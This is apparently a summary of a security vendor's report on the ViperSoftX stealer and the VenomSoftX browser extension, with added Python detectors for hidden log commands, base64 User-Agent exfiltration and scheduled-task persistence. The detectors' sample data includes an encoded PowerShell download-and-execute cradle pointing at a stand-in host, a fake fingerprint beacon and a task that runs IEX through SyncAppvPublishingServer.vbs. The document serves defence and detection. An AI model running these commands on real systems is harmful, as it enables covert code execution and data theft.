ViperSoftX: Hiding in System Logs and Spreading VenomSoftX – Avast Threat Labs

ViperSoftX is a long-running information stealer that conceals its first-stage PowerShell loader inside large system log files and uses multi-stage PowerShell payloads to drop VenomSoftX, a browser extension that performs man-in-the-browser attacks to steal cryptocurrency. The campaign spreads mainly through cracked software and torrents, combines HTTP-header exfiltration with MQTT-based C2, and targets cryptocurrency wallets on several exchanges; India, the USA and Italy are the most affected countries. #ViperSoftX #VenomSoftX

Keypoints

  • ViperSoftX conceals its first-stage PowerShell payload as a single line in the middle of oversized log files. Two variants exist: a short encoded dropper one-liner, and an unencoded PowerShell script that carries its own decryption routines.
  • The loader decrypts a blob appended to the end of its binary with AES-CBC and a key/IV hardcoded in the same binary, then deserializes the plaintext as a protocol buffer holding five files, among them a PowerShell stealer and the ViperSoftX payload.
  • Persistence relies on the legacy SyncAppvPublishingServer.vbs script shipped with Windows to create a scheduled task that later executes the hidden scripts.
  • VenomSoftX is a malicious extension for Chromium-based browsers, installed by a dedicated installer. It hijacks cryptocurrency transactions by tampering with the API calls the victim's browser makes to major exchanges, and it monitors clipboard content.
  • The extension can be loaded into several browsers and masquerades as well-known legitimate extensions to evade detection.
  • The campaign collects a machine fingerprint, clipboard data and browser/OS information, base64-encodes the result and sends it to the hardcoded C2 server inside an HTTP header; MQTT, via the public broker broker.emqx.io, is also used in the C2 channel.
  • Tens of thousands of victims have been observed since 2022, concentrated in India, the USA and Italy. Five exchanges are targeted: Blockchain.com, Binance, Coinbase, Gate.io and Kucoin.

MITRE Techniques

  • [T1059.001] PowerShell – Both hidden-log variants rely on PowerShell to decode, decrypt and execute the next stage; the first variant is an encoded one-liner, the second a plain script. “The second variant is in the form of a PowerShell script without the encoding…”
  • [T1027] Obfuscated Files and Information – The loader carries an encrypted blob appended to the end of its own binary and decrypts it at runtime with a key and IV hardcoded in that binary. “This blob can be decrypted straight away using a hardcoded key as well as IV inside the binary.”
  • [T1053.005] Scheduled Task – Persistence and the later execution of the hidden scripts go through a scheduled task created with the legacy SyncAppvPublishingServer.vbs script. “The malware creates a scheduled task using the legacy SyncAppvPublishingServer.vbs script for executing these hidden scripts afterward as well for ensuring persistence.”
  • [T1115] Clipboard Data – ViperSoftX watches the clipboard for cryptocurrency wallet addresses and replaces them (clipboard swapping). “monitors the clipboard for cryptocurrency wallet addresses to perform clipboard swapping.”
  • [T1555.003] Credentials from Web Browsers – Through the VenomSoftX extension the malware steals credentials and clipboard content from inside the browser. “steals credentials and clipboard content.”
  • [T1036] Masquerading – VenomSoftX presents itself as various popular browser extensions so that users do not notice it. “The extension disguises itself as various popular browser extensions to avoid user detection.”
  • [T1041] Exfiltration Over C2 Channel – The gathered data and the fingerprint are concatenated, base64-encoded and sent to the hardcoded C&C server inside the User-Agent HTTP header. “The gathered data, as well as the fingerprint, is then concatenated together into a single string, encoded by base64, and sent to the hardcoded C&C server in the User-Agent HTTP header.”
  • [T1564] Hide Artifacts – The first-stage PowerShell script is embedded as a single line in the middle of a large, otherwise innocuous log file. “concealed as small PowerShell scripts on a single line in the middle of otherwise innocent-looking large log files, among others.”
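As an added illustration of the hidden-log technique described in the keypoints and in the Hide Artifacts entry above (editor-written detection code, not Avast's tooling and not the malware's own code), the following Python scanner flags log lines that carry PowerShell indicators or are far longer than the file's median line, and decodes any -EncodedCommand payload back to the UTF-16LE script text it wraps. The log entries, the hidden command and the host example.invalid are constructed for the example.

```python
"""Hunt for PowerShell one-liners hidden among innocuous lines of a large log file."""
import base64
import re
import statistics

# Argument form accepted by powershell.exe: any prefix of -EncodedCommand (-e, -ec, -enc ...)
# followed by a base64 blob that decodes to UTF-16LE script text.
ENCODED_ARG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Indicators that do not belong in an application log line; each hit is reported by its label.
INDICATORS = {
    "powershell_invocation": re.compile(r"\b(?:powershell(?:\.exe)?|pwsh)\b", re.IGNORECASE),
    "encoded_command": ENCODED_ARG,
    "base64_decode": re.compile(r"FromBase64String", re.IGNORECASE),
    "invoke_expression": re.compile(r"Invoke-Expression|\bIEX\b", re.IGNORECASE),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest", re.IGNORECASE),
    "stealth_switches": re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noni\b", re.IGNORECASE),
}


def encode_powershell_command(command: str) -> str:
    """Produce the value powershell.exe -EncodedCommand expects (UTF-16LE text, base64)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str):
    """Inverse of encode_powershell_command; None if the blob is not UTF-16LE script text."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if all(c.isprintable() or c in "\r\n\t" for c in text) else None


def scan_log(text: str, length_ratio: float = 4.0, min_length: int = 200):
    """Return one finding per line that carries PowerShell indicators or is abnormally long."""
    lines = text.splitlines()
    median = statistics.median(len(line) for line in lines) if lines else 0
    findings = []
    for number, line in enumerate(lines, start=1):
        reasons = [label for label, pattern in INDICATORS.items() if pattern.search(line)]
        if len(line) > min_length and len(line) > length_ratio * median:
            reasons.append("abnormal_length")
        if not reasons:
            continue
        match = ENCODED_ARG.search(line)
        decoded = decode_encoded_command(match.group(1)) if match else None
        findings.append({"line": number, "reasons": reasons, "decoded": decoded})
    return findings


# Constructed sample: eight ordinary entries with a hostile one-liner buried in the middle.
# The download cradle and the host example.invalid are invented for this example.
HIDDEN_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
SAMPLE_LOG = "\n".join([
    "2022-10-01 12:00:01 INFO  service started",
    "2022-10-01 12:00:02 INFO  loaded configuration from C:\\ProgramData\\App\\config.ini",
    "2022-10-01 12:00:02 DEBUG cache warmed, 1532 entries",
    "2022-10-01 12:00:05 WARN  retry 1/3 connecting to update.example.invalid",
    "powershell -w hidden -nop -enc " + encode_powershell_command(HIDDEN_COMMAND),
    "2022-10-01 12:00:06 INFO  update check finished, no new version",
    "2022-10-01 12:00:09 INFO  user session opened",
    "2022-10-01 12:01:00 DEBUG heartbeat ok",
    "2022-10-01 12:02:00 INFO  service stopped",
])

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["line"], finding["reasons"], finding["decoded"])
```

Run it over real log directories with a generator that streams each file through scan_log; the length heuristic is what catches variants that avoid the obvious keywords, so keep it even when the indicator list is tuned down for a noisy environment.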
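The base64-in-User-Agent exfiltration described in the keypoints and in the T1041 entry can be caught on the network side. The following Python triage is added here as an example and is not taken from the report: it parses a constructed proxy log format, decodes any User-Agent that is a bare base64 token of printable text, and splits the result into fields. The key=value|key=value fingerprint layout, the field names and the host c2.example.invalid are assumptions; the real layout of the concatenated string is not documented on this page.

```python
"""Triage proxy logs for User-Agent values that are really base64-encoded exfiltration."""
import base64
import re

# Constructed log format for the example: timestamp, client, quoted request, status, quoted UA.
LINE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) "(?P<method>[A-Z]+) (?P<url>\S+)" (?P<status>\d{3}) ua="(?P<ua>[^"]*)"$'
)
# A genuine browser UA contains spaces, parentheses and dots; none of those pass this filter.
B64_ONLY = re.compile(r"^[A-Za-z0-9+/]{24,}={0,2}$")


def decode_if_base64_text(value: str):
    """Return the decoded text if value is base64 of printable text, else None."""
    if not B64_ONLY.match(value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if all(c.isprintable() or c in "\r\n\t" for c in text) else None


def parse_fingerprint(text: str) -> dict:
    """Split a 'key=value|key=value' string; this delimiter layout is an assumption."""
    fields = {}
    for part in text.split("|"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def find_encoded_user_agents(log_text: str):
    """One finding per request whose User-Agent decodes to text instead of a browser string."""
    findings = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        decoded = decode_if_base64_text(m["ua"])
        if decoded is None:
            continue
        findings.append({
            "src": m["src"],
            "url": m["url"],
            "decoded": decoded,
            "fields": parse_fingerprint(decoded),
        })
    return findings


# Constructed sample traffic: two legitimate requests and one beacon carrying a fingerprint.
# Fingerprint contents and the C2 host are invented; the page's IoC domains can be matched too.
FAKE_FINGERPRINT = "host=WS-01|user=alice|os=Windows 10.0.19045|browser=Chrome 107|clip=bc1qexampleaddress"
BEACON_UA = base64.b64encode(FAKE_FINGERPRINT.encode("utf-8")).decode("ascii")
SAMPLE_LOG = "\n".join([
    '2022-11-01T09:00:01Z 10.0.0.5 "GET https://www.example.com/" 200 '
    'ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
    'Chrome/107.0.0.0 Safari/537.36"',
    '2022-11-01T09:00:02Z 10.0.0.7 "GET https://updates.example.com/manifest.json" 200 ua="curl/7.85.0"',
    '2022-11-01T09:00:03Z 10.0.0.5 "POST http://c2.example.invalid/connect" 200 ua="' + BEACON_UA + '"',
])

if __name__ == "__main__":
    for finding in find_encoded_user_agents(SAMPLE_LOG):
        print(finding["src"], finding["url"], finding["fields"])
```

The decoded fields are what make the alert actionable: the clipboard value in particular tells you whether a wallet address was already captured, which changes the incident's priority.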
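Persistence through SyncAppvPublishingServer.vbs, described in the keypoints and in the T1053.005 entry, leaves a footprint in the task's XML definition. The following Python check is an added example, not Avast's code: it parses task XML of the kind Windows stores under %SystemRoot%\System32\Tasks (or exports with schtasks /query /tn <name> /xml) and flags Exec actions that reference the script. Both task definitions are constructed; the argument string in the malicious one is illustrative and not the malware's actual command line.

```python
"""Flag scheduled tasks whose action runs SyncAppvPublishingServer.vbs (a PowerShell proxy)."""
import xml.etree.ElementTree as ET

# Namespace used by every task definition Windows writes to %SystemRoot%\System32\Tasks.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Scripts that exist to launch PowerShell on behalf of their caller; the page names this one.
PROXY_SCRIPTS = ("syncappvpublishingserver.vbs",)


def task_actions(task_xml: str):
    """Return (command, arguments) for every Exec action in a task definition."""
    root = ET.fromstring(task_xml)
    actions = []
    for exec_node in root.findall(".//t:Actions/t:Exec", NS):
        command = (exec_node.findtext("t:Command", default="", namespaces=NS) or "").strip()
        arguments = (exec_node.findtext("t:Arguments", default="", namespaces=NS) or "").strip()
        actions.append((command, arguments))
    return actions


def suspicious_actions(task_xml: str):
    """Exec actions that invoke one of PROXY_SCRIPTS anywhere in command or arguments."""
    hits = []
    for command, arguments in task_actions(task_xml):
        blob = f"{command} {arguments}".lower()
        if any(script in blob for script in PROXY_SCRIPTS):
            hits.append((command, arguments))
    return hits


# Constructed task definitions (XML declaration omitted; on disk Windows writes them as UTF-16,
# so read real files as bytes before passing them to ET.fromstring). The malicious one mirrors
# the persistence mechanism on this page; its argument string is illustrative only.
MALICIOUS_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>wscript.exe</Command>
      <Arguments>C:\Windows\System32\SyncAppvPublishingServer.vbs "n; IEX (Get-Content C:\ProgramData\app\big.log)[1234]"</Arguments>
    </Exec>
  </Actions>
</Task>
"""

BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><Enabled>true</Enabled></CalendarTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>%SystemRoot%\System32\cleanmgr.exe</Command>
      <Arguments>/autoclean</Arguments>
    </Exec>
  </Actions>
</Task>
"""

if __name__ == "__main__":
    for name, xml_text in (("malicious", MALICIOUS_TASK), ("benign", BENIGN_TASK)):
        print(name, suspicious_actions(xml_text))
```

Matching on the lower-cased command and arguments together is deliberate: the script can be invoked directly as the Command, or indirectly through wscript.exe or cscript.exe with the path in Arguments, and either form should trip the check.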

Indicators of Compromise

  • [SHA256] – hashes of dropped components and payloads (e.g. Activator.exe, the hidden-log script variants, the ViperSoftX PowerShell stealer): e1dc058fc8282acb95648c1ee6b0bc36b0d6b5e6853d4f602df5549e67d6d11a, 0bad2617ddb7586637ad81aaa32912b78497daf1f69eb9eb7385917b2c8701c2, 0cb5c69e8e85f44725105432de551090b28530be8948cc730e4b0d901748ff6f
  • [SHA256] – two further hashes (e.g. ViperSoftX PowerShell, VenomSoftX installer) are listed in the original report.
  • [Domain] – command-and-control and update domains used by the malware (e.g. api.private-chatting[.]com, apps-analyser[.]com, wmail-blog[.]com, wmail-service[.]com)
  • [URL] – specific endpoints referenced by the malware (e.g. http://apps-analyser[.]com/api/v1/, http://api.private-chatting[.]com/connect)
  • [File name] – notable filenames observed in the campaign (e.g. Activator.exe, VenomSoftX browser installer, ViperSoftX PowerShell, content.bootstrap.js, manifest.json)
  • [File name] – additional dropped artifacts (e.g. hidden log script, first variant; hidden log script, second variant)

Read more: https://decoded.avast.io/janrubin/vipersoftx-hiding-in-system-logs-and-spreading-venomsoftx/